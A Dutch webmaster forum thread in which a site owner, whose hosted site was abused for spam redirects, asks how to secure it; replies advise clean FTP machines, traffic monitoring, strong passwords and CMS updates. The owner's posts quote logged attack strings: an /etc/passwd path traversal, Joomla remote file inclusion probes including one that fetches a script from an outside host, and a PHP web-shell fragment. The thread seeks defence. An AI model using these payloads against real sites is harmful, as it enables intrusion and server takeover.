website beveiligen tegen hackers

[jukommerce]

Hoe kun je je website beveiligen tegen hackers?
Het gaat om hackers die bijvoorbeeld de volgende opdracht gebruiken:

/?pg=../../../../../../../../../../../../../../../etc/passwd%00

of

//?mosconfig_absolute_path=...

Tot slot:

[".exec("whoami")."@$SERVER_NAME ".exec("pwd")."] \$    "; if ($c) passthru($c." 2>&1"); } ?

Ik heb wel veel op buitenlandse sites gelezen. Ik krijg echter niet de relevante informatie waar ik naar op zoek ben. Ook omdat veel sites die hierover gaan in het Russisch, Roemeens of Chinees zijn geschreven.

Zelf ben ik geen techniek-expert. Ik gebruik de sitebuilder van Starthosting.nl.
Ook staat mijn content niet op een eigen server, maar die van Starthosting.

Een flink aantal websites zijn slachtoffer van deze praktijken. Ik merkte dat mijn site een tijdje is gebruikt voor het omleiden van zoekmachine-traffic naar hacks en virussen (een php-bestandje vol met trefwoorden, gekoppeld aan malafide websites). Daar merk je verder niks van... tenzij je je website-statistieken bekijkt.

Ik moet wel zeggen dat de hackers ook enorme SEO-experts zijn... gezien er tijdens de hack ook veel meer verkeer vanuit Google binnenkwam.

 

[evertVB]

In elk geval zorgen dat de pc, waarmee je met ftp inlogt, virus-vrij is. Anders kan jouw ftp-wachtwoord worden afgeluisterd.
Je kunt ook regelmatig checken of de bestanden, waaruit jouw website bestaat, synchroon lopen met jouw lokale kopie.
En er ligt een verantwoordelijkheid bij jouw webhoster.
Ik zou niet weten wat een webmaster meer kan doen dan dit.

 

[Goeroeboeroe]

Het minimaal dagelijks bekijken van goede statistieken van je site is een van de beste maatregelen (naast de dingen natuurlijk die evertVB al zegt). Plotsklaps veel verkeer uit de Oekraïne zou toch te denken moeten geven, bijvoorbeeld.
Als je je aanmeldt bij Webmaster Tools van Google, zie je ook 'n overzicht van woorden waar je op wordt gevonden. Als daar plotsklaps 'Viagra' of andere feestelijkheden opduiken, wordt het ook tijd je even achter je oren te krabben (en als je uitgekrabd bent even grondig te gaan zoeken in je code )

 

[Naarling]

Ik zou niet weten wat een webmaster meer kan doen dan dit.

Zorgen dat het wachtwoord lang en niet te raden is. Zorgen dat, als je een CMS gebruikt, je je software regelmatig update en geen lekke modules installeert.

 

[jukommerce]

De opmerking over CMS vind ik interessant, omdat veel van de bovenstaande codes worden gebruikt om onder andere lekke modules in verouderde versies van Joomla te kraken. Als je zelf webdevelopment-software hebt, dan moet je die gewoon up-to-date houden.

Als je een sitebuilder van je host gebruikt, dan weet je niet of die up-to-date is. Hoe kan ik een veelvoorkomende lekke module herkennen? Hoe kan ik zien of mijn website lek is?

Uit die code met "passwd" maak ik op dat de hacker op zoek is geweest naar de bestanden waarin de passwords verstopt zitten. Mogelijk probeert hij / zij de encryptie te kraken. Kan mij niet voorstellen dat dit nodig is als je volledige FTP-toegang hebt.

Gezien een goed beveiligde computer is het andere scenario (de afgeluisterde computer) wat minder waarschijnlijk. Maar mogelijk kan iemand mij een tip geven hoe ik zo'n afluister-bestand kan herkennen... daar mijn Kaspersky niks kan vinden. (misschien handig als de host registreert vanaf welke ip-adressen er op de FTP is ingelogd... dan kun je tenminste zien dat er iets aan de hand is).

 

[jukommerce]

De hacker gebruikt zo'n soort code:

http://su-página-web.com/?cat=13%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt??

. Hierover heeft een Spaanse website een interessant artikel geschreven:

http://luctus.es/2010/03/identificando-bot-scanners-spreaders-php/ (hier komt deze voorbeeld-code ook vanaf)

Het blijkt dat de hackers naar kwetsbaarheden zoeken in het php-script. Een groeiend probleem waarover vooral Russische websites schrijven en deze Spaanse dan.

Iemand tips hoe je je PHP 'hackersafe' maakt:?